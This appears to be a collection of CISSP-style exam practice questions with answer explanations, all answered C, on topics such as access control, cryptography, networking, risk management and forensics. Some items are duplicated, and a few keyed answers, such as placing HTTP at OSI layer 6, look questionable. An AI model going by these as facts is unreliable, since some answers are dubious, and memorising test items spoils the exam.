C. A network directory is a container for users and network resources. One directory does not contain (or know about) all of the users and resources within the enterprise, so a collection of directories must be used. A virtual directory gathers the necessary information used from sources scattered throughout the network and stores them in a central virtual directory (virtual container). This provides a unified view of all users' digital identity information throughout the enterprise. The virtual directory periodically synchronizes itself with all of the identity stores (individual network directories) to ensure the most up-to-date information is being used by all applications and identity management components within the enterprise.

Jack has been told that successful attacks have been taking place and data that has been encrypted by his company's software systems has leaked to the company's competitors. Through Jack's investigation he has discovered that the lack of randomness in the seeding values used by the encryption algorithms in the company's software exposed patterns and allowed for successful reverse engineering. Which of the following is most likely the item that is the root of the problem when it comes to the necessary randomness explained in the scenario? A. Asymmetric algorithm B. Out-of-band communication compromise C. Number generator D. Symmetric algorithm

C. A number generator is used to create a stream of random values and must be seeded by an initial value. This piece of software obtains its seeding value from some component within the computer system (time, CPU cycles, etc.). Although a computer system is complex, it is a predictable environment, so if the seeding value is predictable in any way, the resulting values created are not truly random, but pseudorandom. If the values from a number generated illustrate patterns and those patterns are recognizable during cryptographic processes, this weakness could allow an attacker to reverse-engineer the algorithm and gain access to confidential data.

Sally is carrying out a software analysis on her company's proprietary application. She has found out that it is possible for an attacker to force an authorization step to take place before the authentication step is completed successfully. What type of issue would allow for this type of compromise to take place? A.Back door B.Maintenance hook C.Race condition D.Data validation error

C. A race condition is when processes carry out their tasks on a shared resource and there is a potential that the sequence is carried out in the wrong order. A race condition is possible when two or more processes use a shared resource, as in data within a variable. It is important that the processes carry out their functionality in the correct sequence. If process 2 carried out its task on the data before process 1, the result will be much different than if process 1 carried out its tasks on the data before process 2. If authentication and authorization steps are split into two functions, there is a possibility an attacker could use a race condition to force the authorization step to be completed before the authentication step.

What is the difference between a "penetration test" and a "red team exercise"? A. there is no difference. Both terms can be used interchangeably for the same activities. B. A red team exercise seeks to examine whether a set of exploitable vulnerabilities exist in an environment and can lead to compromise, whereas a penetration test seeks to explore how any aspect of an organization can be subverted by an adversary. C. A red team exercise is most likely to uncover problems beyond mere software or system vulnerabilities, whereas a penetration test focuses on technical issues that have not been remediated. D. A penetration test is more likely to uncover problems beyond mere software or system vulnerabilities, whereas a red team exercise focuses on technical issues that have not been remediated.

C. A red team exercise is most likely to uncover problems beyond mere software or system vulnerabilities, whereas a penetration test focuses on technical issues that have not been remediated.

Terry is told by his boss that he needs to implement a networked-switched infrastructure that allows several systems to be connected to any storage device. What does Terry need to roll out? A. Electronic vaulting B. Hierarchical storage management C. Storage area network D. Remote journaling

C. A storage area network (SAN) is made up of several storage systems that are connected together to form a single storage network. A SAN is a networked infrastructure that allows several systems to be connected to any storage device. This is usually provided by using switches to create a switching fabric. The switching fabric allows for several devices to communicate with back-end storage devices and provides redundancy and fault tolerance by not depending upon one specific line or connection.

What is the difference between least privilege and need to know? A. A user should have least privileges that restrict her need-to-know B. A user should have a security clearance to access resources, a need-to-know about those resources, and least Privilege to give her full control of all resources. C. A user should have a need-to-know to access particular resources; least privilege should be implemented to ensure she only accesses the resources she has a need-to-know. D. They are two terms for the same issue.

C. A user should have a need-to-know to access particular resources; least privilege should be implemented to ensure she only accesses the resources she has a need-to-know.

A user's digital identity is commonly made up of more than just a username. Which of the following is not a common item that makes up a user's identity? A. Entitlements B. Traits C. Figures D. Attributes

C. A user's identity is commonly a collection of her attributes (department, role in company, shift time, clearance, and others), her entitlements (resources available to her, authoritative rights in the company, and so on), and her traits (biometric information, height, gender, and so forth).

Drew determines that the cost of buying anti-spyware for technician laptops exceeds the loss expectancy if spyware threats were to happen. Drew should ___ the risk. A. Mitigate B. Eliminate C. Accept D. Transfer

C. Accept

During a post-mortem incident evaluation, it is discovered that coercion was used by an attacker to infiltrate the company and obtain confidential information. This tactic would best be characterized as: A. Eavesdropping. B. Passive. C. Active. D. Sniffing.

C. Active.

Which of the following best describes what role-based access control offers companies in reducing administrative burdens? A. It allows entities closer to the resources to make decisions about who can and cannot access resources. B. It provides a centralized approach for access control, which frees up department managers. C. User membership in roles can be easily revoked and new ones established as job assignments dictate. D. It enforces an enterprise-wide security policy, standards, and guidelines.

C. An administrator does not need to revoke and reassign permissions to individual users as they change jobs. Instead, the administrator assigns permissions and rights to a role, and users are plugged into those roles.

Which of the following best describes what role-based access control offers companies in reducing administrative burdens? A. It allows entities closer to the resources to make decisions about who can and cannot access resources. B. It provides a centralized approach for access control, which frees up department managers. C. User membership in roles can be easily revoked and new ones established as job assignments dictate. D. It enforces enterprise-wide security policies, standards, and guidelines.

C. An administrator does not need to revoke and reassign permissions to individual users as they change jobs. Instead, the administrator assigns permissions and rights to a role, and users are plugged into those roles.

Which of the following is not considered an anomaly-based intrusion protection system? A. Statistical anomaly-based B. Protocol anomaly-based C. Temporal anomaly-based D. Traffic anomaly-based

C. An anomaly-based IPS is a behavioral-based system that learns the "normal" activities of an environment. The three types are listed next: Statistical anomaly-based Creates a profile of "normal" and compares activities to this profile Protocol anomaly-based Identifies protocols used outside of their common bounds Traffic anomaly-based Identifies unusual activity in network traffic

Which of the following best describes how SAML, SOAP, and HTTP commonly work together in an environment that provides web services? A. The security attributes are put into SAML format. The web service request and the authentication data are encrypted in a SOAP message. The message is transmitted in an HTTP connection. B. The security attributes are put into SAML format. The web service request and the authentication data are encapsulated in a SOAP message. The message is transmitted in an HTTP connection over TLS. C. The authentication data is put into SAML format. The web service request and authentication data are encapsulated in a SOAP message. The message is transmitted in an HTTP connection. D. The authentication data is put into SAML format. The HTTP request and the authentication data are encapsulated in a SOAP message. The message is transmitted in an HTTP connection.

C. As an example, when you log in to your company's portal and double-click a link (e.g., Salesforce), your company's portal will take this request and your authentication data and package them up in an Security Assertion Markup Language (SAML) format and encapsulate that data into a Simple Object Access Protocol (SOAP) message. This message would be transmitted over an HTTP connection to the Salesforce vendor site, and once you are authenticated you can interact with the vendor software. SAML packages up authentication data, SOAP packages up web service requests and SAML data, and the request is transmitted over an HTTP connection.

Hanna is a security manager of a company that relies heavily on one specific operating system. The operating system is used in the employee workstations and is embedded within devices that support the automated production line software. She has uncovered that the operating system has a vulnerability that could allow an attacker to force applications to not release memory segments after execution. Which of the following best describes the type of threat this vulnerability introduces? A. Injection attacks B. Memory corruption C. Denial of service D. Software locking

C. Attackers have identified programming errors in operating systems that allow them to "starve" the system of its own memory. This means the attackers exploit a software vulnerability that ensures that processes do not properly release their memory resources. Memory is continually committed and not released, and the system is depleted of this resource until it can no longer function. This is an example of a denial-of-service attack.

Why should the team that will perform and review the risk analysis information be made up of people in different departments? A. To make sure the process is fair and that no one is left out. B. It shouldn't. It should be a small group brought in from outside the organization because otherwise, the analysis is biased and unusable. C. Because people in different departments understand the risks of their department. Thus, it ensures the data going into the analysis is as close to reality as possible. D. Because the people in the different departments are the ones causing the risks, so they should be the ones held accountable.

C. Because people in different departments understand the risks of their department. Thus, it ensures the data going into the analysis is as close to reality as possible.

What role does biometrics play in access control? A. Authorization B. Authenticity C. Authentication D. Accountability

C. Biometrics is a technology that validates an individual's identity by reading a physical attribute. In some cases, biometrics can be used for identification, but that was not listed as an answer choice.

Which of the following refers to the assessment of a system by someone with no advance knowledge of how it was designed or implemented? A. white box testing. B. Gray box testing. C. black box testing. D. blue box testing.

C. Black Box Testing.

What is generally the safest, most secure way to acquire software? A. From a reputable vendor of proprietary software, once tested in the deployment environment B. Downloading very popular open-source software that has been inspected for bugs by a large and active community C. Downloading either proprietary or open-source software, but fuzzing it in a lab environment prior to deployment D. Downloading open-source software and deploying it only after the code base has been verified by cryptographic checksum

C. Black-box testing all software in a lab environment is the best way to uncover both feature and security defects prior to deployment into a sensitive environment.

Which of the following correctly describes Bluejacking? A. Bluejacking is a harmful, malicious attack. B. It is the process of taking over another portable device via a Bluetooth-enabled device. C. It is commonly used to send contact information. D. The term was coined by the use of a Bluetooth device and the act of hijacking another device.

C. Bluetooth is vulnerable to an attack called Bluejacking, which entails an attacker sending an unsolicited message to a device that is Bluetooth-enabled. Bluejackers look for a receiving device, such as a mobile device or laptop, and then send a message to it. Often, the Bluejacker is trying to send their business card to be added to the victim's contact list in their address book. The countermeasure is to put the Bluetooth-enabled device into nondiscoverable mode so that others cannot identify this device in the first place. If you receive some type of message this way, just look around you. Bluetooth only works within a 10-meter distance, so it is coming from someone close by.

Increased developmental testing and the use of only operational data are good remedies to what operational security threat? A. Employee shoulder surfing B. System incompatibility C. Buffer overflows D. Firewall avoidance.

C. Buffer overflows

Increased developmental testing and the use of only operational data are good remedies to what operational security threat? A. Employee shoulder surfing. B. System incompatibility. C. Buffer overflows D. Firewall avoidance.

C. Buffer overflows

Increased developmental testing and the use of only operational data are good remedies to what operational security threat? A. Employee shoulder surfing. B. System incompatibility. C. Buffer overflows. D. Firewall Avoidance

C. Buffer overflows.

Which of the following is charlie most likely concerned with in this situations? A. injection attacks. B. memory block. C. Buffer overflows. D. Browsing attacks.

C. Buffer overflows.

Which protocol is commonly used to authenticate users on dial-up connections? A. PPTP B. IPSec C. CHAP D. L2F

C. CHAP

Ethernet uses what type of access method? A. CSMD. B. Polling. C. CSMA. D. Token passing.

C. CSMA

Widgets, Inc.'s software development processes are documented, and the organization is capable of producing its own standard of software processes. Which of the following Capability Maturity Model Integration levels best describes Widgets, Inc.? A. Initial B. Repeatable C. Defined D. Managed

C. Capability Maturity Model Integration (CMMI) is a process improvement concept that consists of a collection of techniques used in the process of software development of an organization to design and further enhance software. The CMMI provides a standard for software development process where the level of maturity of the development process can be measured. The CMMI is classified into five levels, which are Initial, Repeatable, Defined, Managed, and Optimizing. The categorization of these levels depends upon the maturity of the software development and its quality assurance. The basis of Defined level (CMMI Level 3) is that the organizations are capable of producing their own standard of software processes. These processes are improved with the passage of time.

Which model introduced five levels with which the development of an organization's software process is evaluated? A. Total Quality model (TQM) B. IDEAL Model C. Capability Maturity Model Integration. D. Spiral Model.

C. Capability Maturity Model Integration.

There are several components involved with steganography. Which of the following refers to a file that has hidden information in it? A. stegomedium. B. concealment cipher. C. Carrier. D. payload.

C. Carrier.

If a component fails, a system should be designed to do which of the following? A. Change to a protected execution domain B. Change to a problem state C. Change to a more secure state D. Release all data held in volatile memory

C. Change to a more secure state

A company has decided that it no longer wants to maintain its own servers and network environment because of increasing costs and liabilities. The company wants to move to a cloud-based solution, but needs to determine which type of solution best fits its needs. Which of the following provides a correct definition and mapping of a typical cloud-based solution? A. Infrastructure as a Service is provided when a cloud provider delivers a computing platform that includes operating system, database, and web servers. B. Software as a Service is provided when a cloud provider delivers an infrastructure environment similar to a traditional data center. C. Platform as a Service is provided when a cloud provider delivers a computing platform that can include operating system, database, and web servers. D. Software as a Service is provided when a cloud provider delivers a software environment in the form of a computing platform.

C. Cloud computing is a general term that describes how network and server technology can be aggregated and virtualized and then partitioned to provide individual customers specific computing environments. This centralized aggregation and centralized control provides end users with on-demand self-service, broad access across multiple devices, resource pooling, rapid elasticity, and service metering capability. There are different types of cloud computing offerings. Platform as a Service (PaaS) is in place when a cloud provider delivers a computing platform, such as an operating system, database, and web server, as a holistic execution environment. Where Infrastructure as a Service (IaaS) is the "raw IT network," PaaS is the software environment that runs on top of the IT network.

Which of the following best describes an operation that allows changes to a database to be available to all applications and users? A. Rollback B. Deadlock C. Commit D. Submit

C. Commit.

tcsec, itsec, ctcpec, and the federal criteria were used to create what? A. orange book. B. Rainbow series C. Common criteria. D. Red Book.

C. Common criteria.

Which of the following is the best description of a component-based system development method? A. Components periodically revisit previous stages to update and verify design requirements B. Minimizes the use of arbitrary transfer control statements between components C. Uses independent and standardized modules that are assembled into serviceable programs D. Implemented in module-based scenarios requiring rapid adaptations to changing client requirements

C. Component-based development involves the use of independent and standardized modules. Each standard module consists of a functional algorithm or instruction set and is provided with interfaces to communicate with each other. Component-based development adds reusability and pluggable functionality into programs, and is widely used in modern programming to augment program coherence and substantially reduce software maintenance costs. A common example of these modules is "objects" that are frequently used in object-oriented programming.

Management of changes made to a system's hardware, software, or firmware throughout its operational life cycle is referred to as what? A. media control B. program library C. configuration management. D. Operational Security.

C. Configuration Management.

Which of the following reasons why a disaster recovery plan gets outdated is not true? A. Personnel turnover B.Extensive plans can take a lot of work to maintain C. Continuous auditing makes a disaster recovery plan irrelevant. D. Infrastructure and environment changes.

C. Continuous auditing makes a disaster recovery plan irrelevant.

Tim is purchasing a smart card solution for his company. He needs to be aware of the various attacks that can take place against smart cards. Which of the following is not an example of a side-channel attack? A. Differential power analysis. B. Electromagnetic emission C. Corruptive D. Timing.

C. Corruptive

Tim is purchasing a smart card solution for his company. He needs to be aware of the various attacks that can take place against smart cards. Which of the following is not an example of a side-channel attack? A. Differential power analysis. B. Electromagnetic emission C. Corruptive D. Timing.

C. Corruptive

What discipline combines the physical environment and the sociology issues that surround it to reduce crime rates and the fear of crime? A. Layered defense model. B. Target hardening. C. Crime prevention through environmental design. D. Natural Access control

C. Crime prevention through environmental design.

What does DEA stand for? A. Data Encoding Algorithm B. Data Encoding Application C. Data Encryption Algorithm D. Digital Encryption Algorithm

C. DEA is the algorithm that fulfilled the DES standard. So DEA has all of the attributes of DES: a symmetric block cipher that uses 64-bit blocks, 16 rounds, and a 56-bit key.

With respect to data loss prevention (DLP), what term describes the ability to quickly recover from a crisis and to avoid catastrophe, even in the face of an ongoing breach? A. Network DLP (NDLP) B. Endpoint DLP (EDLP) C. DLP resiliency. D. DLP recovery.

C. DLP resiliency.

A network segment located between the protected and unprotected network is called a ____? A. Honeypot B. Safe Zone C. DMZ D. VPN

C. DMZ

Tim's development team is designing a new operating system. One of the requirements of the new product is that critical memory segments need to be categorized as non-executable, with the goal of reducing malicious code from being able to execute instructions in privileged mode. The team also wants to make sure that attacks will have a difficult time predicting execution target addresses. Which of the following best describes the type of protection that needs to be provided by this product? A. Hardware isolation B. Memory induction application. C. Data Execution prevention. D. Domain isolation protection.

C. Data Execution prevention.

If a company wants to protect fax data while it is in transmission, which of the following are valid mechanisms? A. PGP and MIME. B. PEM and TSL C. Data link encryption or fax encryptor. D. Data link encryption and PKI

C. Data link encryption or fax encryptor.

McKenna performs the following data tasks: 1.) assigns data classification levels to meet her business unit's specific needs. 2.) Determines which users an access data. 3.) Verifies security controls are in place and working correctly. Which of the following roles is McKenna performing? A. Data custodian B. Data user. C. Data owner D. Process Owner

C. Data owner

Which of the following statements is true with respect to discovery in a legal case? A. data that has been deleted within its retention period is not subject to discovery. B. Data that has been retained past its retention period is not subject to discovery. C. Data that has been retained due to a retention requirement is subject to discovery. D. Data that has been purged after its retention requirement is subject to discovery.

C. Data that has been retained due to a retention requirement is subject to discovery.

Lisa has learned that most databases implement concurrency controls. What is concurrency, and why must it be controlled? A. Processes running at different levels, which can negatively affect the integrity of the database if not properly controlled B. The ability to deduce new information from reviewing accessible data, which can allow an inference attack to take place C. Processes running simultaneously, which can negatively affect the integrity of the database if not properly controlled D. Storing data in more than one place within a database, which can negatively affect the integrity of the database if not properly controlled

C. Databases are commonly used by many different applications simultaneously and many users interacting with them at one time. Concurrency means that different processes (applications and users) are accessing the database at the same time. If this is not controlled properly, the processes can overwrite each other's data or cause deadlock situations. The negative result of concurrency problems is the reduction of the integrity of the data held within the database. Database integrity is provided by concurrency protection mechanisms. One concurrency control is locking, which prevents users from accessing and modifying data being used by someone else.

Which of the following centralized access control protocols would a security professional choose if her network consisted of multiple protocols, including Mobile IP, and had users connecting via wireless and wired transmissions? A. RADIUS B. TACACS+ C. Diameter D. Kerberos

C. Diameter is a more diverse centralized access control administration technique than RADIUS and TACACS+ because it supports a wide range of protocols that often accompany wireless technologies. RADIUS supports PPP, SLIP, and traditional network connections. TACACS+ is a RADIUS-like protocol that is Cisco-proprietary. Kerberos is a single sign-on technology, not a centralized access control administration protocol that supports all stated technologies.

Aaron is a security manager who needs to develop a solution to allow his company's mobile devices to be authenticated in a standardized and centralized manner using digital certificates. The applications these mobile clients use require a TCP connection. Which of the following is the best solution for Aaron to implement? A. SESAME using PKI B. RADIUS using EAP C. Diameter using EAP D. RADIUS using TTLS

C. Diameter is a protocol that has been developed to build upon the functionality of RADIUS and to overcome many of its limitations. Diameter is an AAA protocol that provides the same type of functionality as RADIUS and TACACS+ but also provides more flexibility and capabilities, including working with EAP. RADIUS uses UDP, and cannot effectively deal well with remote access, IP mobility, and policy control.

Which of the following protocols work in the following layers: application, data link, network, and transport? A. FTP, ARP, TCP, and UDP B. FTP, ICMP, IP, and UDP C. TFTP, ARP, IP, and UDP D. TFTP, RARP, IP, and ICMP

C. Different protocols have different functionalities. The OSI model is an attempt to describe conceptually where these different functionalities take place in a networking stack. The model attempts to draw boxes around reality to help people better understand the stack. Each layer has a specific functionality and has several different protocols that can live at that layer and carry out that specific functionality. These listed protocols work at these associated layers: TFTP (application), ARP (data link), IP (network), and UDP (transport).

The graphic shown here illustrates how which of the following works? A. Rainbow tables B. Dictionary attack C. One-time password D. Strong Authentication

C. Different types of one-time passwords are used for authentication. This graphic illustrates a synchronous token device, which synchronizes with the authentication service by using time or a counter as the core piece of the authentication process.

Which of the following describes a structured walk-through test during disaster recovery testing? A. It is performed to ensure that critical systems will run at the alternate site. B. All departments receive a copy of the recovery plan to review it for completeness. C. Representatives from each department come together and go through the test collectively. D. Normal operations are shut down.

C. During a structured walk-through test, functional representatives meet and review the plan to ensure its accuracy and that it correctly and accurately reflects the company's recovery strategy by walking through it step-by-step.

What do the SA values in the graphic of IPSec that follows represent? A. Security parameter index B. Security ability C. Security association D. Security assistant

C. Each IPSec VPN device will have at least one security association (SA) for each secure connection it uses. The SA, which is critical to the IPSec architecture, is a record of the configurations the device needs to support an IPSec connection over a VPN connection. When two devices complete their handshaking process, which means they have agreed upon a long list of parameters they will use to communicate, these data must be recorded and stored somewhere, which is in the SA. The SA can contain the authentication and encryption keys, the agreed-upon algorithms, the key lifetime, the source IP address, and other information. When a device receives a packet via the IPSec protocol, it is the SA that tells the device what to do with the packet. So if device B receives a packet from device C via IPSec, device B will look to the corresponding SA to tell it how to decrypt the packet, how to properly authenticate the source of the packet, which key to use, and how to reply to the message if necessary.

Which of the following attributes is used to biometrically authenticate a user's identity? A. Something you know B. Something you have C. Something you are D. Someplace you are

C. Each of "something you know," "something you have," and "something you are" are classic factors of authentication used to validate a user's claim of identity. Biometric authentication seeks to authenticate a user based on some unique physical attribute of the user, such as a fingerprint, the granularly pixilated color pattern of the iris of the eye, or the digitized pattern of a voice. This is innate to the user, and so comprises "something you are."

More organizations are outsourcing business functions to allow them to focus on their core business functions. Companies use hosting companies to maintain websites and e-mail servers, service providers for various telecommunication connections, disaster recovery companies for co-location capabilities, cloud computing providers for infrastructure or application services, developers for software creation, and security companies to carry out vulnerability management. Which of the following items should be included during the analysis of an outsourced partner or vendor? i. Conduct onsite inspection and interviews ii. Review contracts to ensure security and protection levels are agreed upon iii. Ensure service level agreements are in place iv. Review internal and external audit reports and third-party reviews V. Review references and communicate with former and existing customers Vi. Review Better Business Bureau reports A. ii, iii, iv B. iv, v, vi C. All of them D. i, ii, iii

C. Each of these items should be considered before committing to an outsource partner or vendor.

Encryption and decryption can take place at different layers of an operating system, application, and network stack. End-to-end encryption happens within the _____. IPSec encryption takes place at the _____ layer. PPTP encryption takes place at the _____ layer. Link encryption takes place at the _____ and _____ layers. A. applications, transport, data link, data link, physical B. applications, transport, network, data link, physical C. applications, network, data link, data link, physical D. network, transport, data link, data link, physical

C. End-to-end encryption happens within the applications. IPSec encryption takes place at the network layer. PPTP encryption takes place at the data link layer. Link encryption takes place at the data link and physical layers.

A new security policy has recently been put into place to achieve many company objectives. Which of the following objectives could not be achieved by a security policy? A. Ensuring that all data has a high level of integrity. B. Reducing levels of fraudulent activity by employees. C. Ensuring higher levels of data accuracy D. Ensuring higher levels of security awareness by employees.

C. Ensuring higher levels of data accuracy

Which of the following is the least important aspect of resource provisioning? A. Ensuring that a new system has been properly secured for deployment. B. Ensuring that the hardware being deployed is being properly tracked as part of asset management. C. Ensuring that the new resource properly expands enterprise capacity. D. Ensuring that the software being deployed is being properly tracked as part of asset management.

C. Ensuring that the new resource properly expands enterprise capacity.

What type of database software integrity service guarantees that tuples are uniquely identified by primary key values? A. Concurrent integrity B. Referential integrity C. Entity integrity D. Semantic integrity

C. Entity integrity guarantees that the tuples are uniquely identified by primary key values. A tuple is a row in a two-dimensional database. A primary key is a value in the corresponding column that makes each row unique. For the sake of entity integrity, every tuple must contain one primary key. If a tuple does not have a primary key, it cannot be referenced by the database.

Most threats to a company stem from: A. Disgruntled employees B. Fire, water, and electrical hazards C. Errors and omissions D. Outsider threats.

C. Errors and omissions

The operations manager has established the use of uniform checklists for all server maintenance. What has the operations manager done? A. Established a baseline. B. Established a regulation C. Established a standard. D. Established a policy.

C. Established a standard.

Kim is a data custodian for her company. She has many duties to perform each day. Which duty would be considered "out of scope" in her position? A. Adding new employees to the assigned data classification groups. B. Performing prescribed system maintenance. C. Establishing baselines for data purges. D. Troubleshooting system problems that affect user productivity.

C. Establishing baselines for data purges.

Use the following scenario to answer Questions 15-17. Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes Steve's confusion? A. Certification must happen first before the evaluation process can begin. B. Accreditation is the acceptance from management, which must take place before the evaluation process. C. Evaluation, certification, and accreditation are carried out by different groups with different purposes. D. Evaluation requirements include certification and accreditation components.

C. Evaluation, certification, and accreditation are carried out by different groups with different purposes. Evaluations are carried out by qualified third parties who use specific evaluation criteria (e.g., Common Criteria) to assign an assurance rating to a tested product. A certification process is a technical review commonly carried out internally to an organization, and accreditation is management's formal acceptance that is carried out after the certification process. A system can be certified internally by a company and not pass an evaluation testing process because they are completely different things.

Which of the following is not considered a delaying mechanism? A. Locks B. Defense-in-depth measures C. Warning signs D. Access controls

C. Every physical security program should have delaying mechanisms, which have the purpose of slowing down an intruder so security personnel can be alerted and arrive at the scene. A warning sign is a deterrence control, not a delaying control.

The trusted computing base (TCB) ensures security within a system when a process in one domain must access another domain in order to retrieve sensitive information. What function does the TCB initiate to ensure that this is done in a secure manner? A. i/o operational execution. B. Process deactivation. C. Execution domain switching. D. Virtual memory to real memory mapping.

C. Execution domain switching.

Bringing in third-party auditors has advantages over using an internal team. Which of the following is not true about using external auditors? A. They are required by certain governmental regulations. B. They bring experience gained by working in many other organizations. C. They know the organization's processes and technology better than anyone else. D. They are less influenced by internal culture and politics.

C. External auditors have certain advantages over in-house teams, but they will almost certainly not be as knowledgeable of internal processes and technology as the folks who deal with them on a daily basis.

Choose the term that describes an audit performed to demonstrate that an organization is complying with its contractual obligations to another organization. A. Internal audit B. Third-party audit C. External audit D. Compliance audit

C. External audits are used to ensure that contractors are meeting their contractual obligations, so that is the best answer. A compliance audit would apply to regulatory or industry standards and would almost certainly be a third-party audit, which makes answer D a poor fit in most cases.

Assigning data classification levels can help with all of the following except: A. The grouping of classified information with hierarchical and restrictive security B. Ensuring that nonsensitive data is not being protected by unnecessary controls C. Extracting data from a database D. Lowering the costs of protecting data

C. Extracting data from a database

In the United States, federal agencies must adhere to Federal Information Processing Standard (FIPS) 201-2 "Personal Identity Verification," which discusses technical measures of authentication for federal employees and contractors. This standard must be followed in order to ensure which of the following? A. That government employees are properly cleared for the work assigned B. That government employees are only allowed access to data of their clearance level C. That the identity of the government employee has been appropriately verified D. That the data that government employees have access to has been appropriately classified

C. FIPS 201-2 specifies the U.S. government standards for Personal Identity Verification (PIV), giving varying requirements of assurance. Access by government employees and contracted agents to restricted information hinges on their level of clearance and their need to know it, but first and foremost the government requires assurance that the individual is who they say they are.

Which of the following is not a correct characteristic of the Failure Modes and Effect Analysis (FMEA) method? A. Determining functions and identifying functional failures B. Assessing the causes of failure and their failure effects through a structured process C. Structured process carried out by an identified team to address high-level security compromises D. Identifying where something is most likely going to break and either fixing the flaws that could cause this issue or implementing controls to reduce the impact of the break

C. Failure Modes and Effect Analysis (FMEA) is a method for determining functions, identifying functional failures, and assessing the causes of failure and their failure effects through a structured process. It is commonly used in product development and operational environments. The goal is to identify where something is most likely going to break and either fix the flaws that could cause this issue or implement controls to reduce the impact of the break.

Which of the following provides a true characteristic of a fault tree analysis? A. Fault trees are assigned qualitative values to faults that can take place over a series of business processes. B. Fault trees are assigned failure mode values. C. Fault trees are labeled with actual numbers pertaining to failure probabilities. D. Fault trees are used in a stepwise approach to software debugging.

C. Fault tree analysis follows this general process. First, an undesired effect is taken as the root, or top, event of a tree of logic. Then, each situation that has the potential to cause that effect is added to the tree as a series of logic expressions. Fault trees are then labeled with actual numbers pertaining to failure probabilities.

The data owner is most often described by all of the following except A. Manager in charge of a business unit B. Ultimately responsible for the protection of the data C. Financially liable for the loss of the data D. Ultimately responsible for the use of the data

C. Financially liable for the loss of the data

For an enterprise security architecture to be successful in its development and implementation, which of the following items must be understood and followed? i.Strategic alignment ii.Process enhancement iii.Business enablement iv.Security effectiveness A. i, ii B. ii, iii C. i, ii, iii, iv D. iii, iv

C. For an enterprise security architecture to be successful in its development and implementation, the following items must be understood and followed: strategic alignment, process enhancement, business enablement, and security effectiveness.

Why is a "Methodology" section as critical to a technical security assessment report as the findings themselves? A. It isn't. The findings and suggested mitigations are far more important. B. It helps management understand the value of the expensive tools that have been purchased to conduct the assessment, and the expense of the effort it took to use them to produce the results. C. It describes how the tests can be repeated by others to validate the results as required, and to further validate that mitigations, once deployed, have been effective. D. It provides the audience with the context of how, where, and why the inspection was conducted.

C. For any given finding to be deemed truly valid, the method for testing it must also be deemed both valid and repeatable by other analysts seeking to understand the nature and scope of the weakness exposed.

Which of the following is a necessary characteristic of evidence for it to be admissible? A. it must be real. B. It must be noteworthy. C. It must be reliable. D. It must be important.

C. For evidence to be admissible, it must be relevant, complete, sufficient, and reliable to the case. For evidence to be reliable, it must be consistent with fact and must not be based on opinion or be circumstantial.

Which of the following is a correct statement regarding digital forensics? A. It is the study of computer technology. B. It is a set of hardware-specific processes that must be followed in order for evidence to be admissible in a court of law. C. It encompasses network and code analysis, and may be referred to as electronic data discovery. D. Digital forensic responsibilities should be assigned to a network administrator before an incident occurs.

C. Forensics is a science and an art that requires specialized techniques for the recovery, authentication, and analysis of electronic data that could have been affected by a criminal act. It is the coming together of computer science, information technology, and engineering with the legal system. When discussing digital forensics with others, you might hear the terms computer forensics, network forensics, electronic data discovery, cyberforensics, and forensic computing. (ISC)2 uses digital forensics as a synonym for all of these other terms, so that's what you will most likely see on the CISSP exam. Digital forensics encompasses all domains in which evidence is in a digital or electronic form, either in storage or on the wire.

What is the purpose of the data link layer? A. end-to-end connection. B. Dialog control. C. Framing. D. Data syntax.

C. Framing.

Randy is a manager and responsible for business continuity training. He has been told the company needs training to allow personnel to validate their operational readiness for emergencies by performing their duties in a simulated operational environment. What type of training does Randy need to implement? A. Structured B. Operational C. Functional D. Interruption.

C. Functional

__________ is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. A. Agile testing B. Structured testing C. Fuzzing D. EICAR

C. Fuzz testing, or fuzzing, is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

Which of the following is an international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy and provides guidelines on the protection of privacy and transborder flows of personal data rules? A. Council of Global Convention on Cybercrime B. Council of Europe Convention on Cybercrime C. Organisation for Economic Co-operation and Development D. Organisation for Cybercrime Co-operation and Development

C. Global organizations that move data across other country boundaries must be aware of and follow the Organisation for Economic Co-operation and Development (OECD) Guidelines on the Protection of Privacy and Transborder Flows of Personal Data. Since most countries have a different set of laws pertaining to the definition of private data and how it should be protected, international trade and business get more convoluted and can negatively affect the economy of nations. The OECD is an international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy. Because of this, the OECD came up with guidelines for the various countries to follow so that data is properly protected and everyone follows the same type of rules.

Which security architecture model defines how to securely develop access rights between subjects and objects? A. brewer-nash B. Clark-Wilson. C. Graham-Denning D. Bell-LaPadula

C. Graham-Denning

Of the following, which represents the best programming? A. low cohesion, low coupling B. low cohesion, high coupling. C. High cohesion, low coupling. D. High cohesion, high coupling.

C. High cohesion, low coupling.

Which of the following is not a drawback of using hot sites? A. Hot sites need security controls, as they usually contain mirrored copies of live production data. B. It's expensive to have full redundancy in hardware, software, communication lines, and applications. C. Hot sites are available immediately or within maximum tolerable downtime (MTD) D. Transaction redundancy controls need to be implemented to keep data up to date.

C. Hot sites are available immediately or within maximum tolerable downtime (MTD)

To get management's support and approval of the plan, a business case must be made. Which of the following is least important to this business case? A. regulatory and legal requirements. B. Company vulnerabilities to disasters and disruptions. C. How other companies are dealing with these issues. D. The impact the company can endure if a disaster hit.

C. How other companies are dealing with these issues.

Which of the following is not a factor in determining the sensitivity of data? A. who should be accessing the data. B. The value of the data. C. How the data will be used D. The level of damage that could be caused should the data be exposed.

C. How the data will be used.

HTTP involves which of the following protocols at which layers of the OSI model? A. Hypertext transfer protocol at layer 4 over secure sockets layer at layer 3. B. Hypertext transfer protocol at layer 5 over secure sockets layer at layer 4. C. Hypertext transfer protocol at layer 6 over secure sockets layer at layer 5 D. hypertext transfer protocol at layer 3 over secure sockets layer at layer 3.

C. Hypertext transfer protocol at layer 6 over secure sockets layer at layer 5

Which of the following standards would be most useful to you in ensuring your information security management system follows industry best practices? A. NIST SP 800-53 B. Six Sigma C. ISO/IEC 27000 series D. COSO IC

C. ISO/IEC 27000 series

Which ISO/IEC standard would be best for Jack to follow to meet his goals? A. ISO/IEC 27002 B. ISO/IEC 27004 C. ISO/IEC 27005 D. ISO/IEC 27006

C. ISO/IEC 27005 is the international standard for risk assessments and analysis.

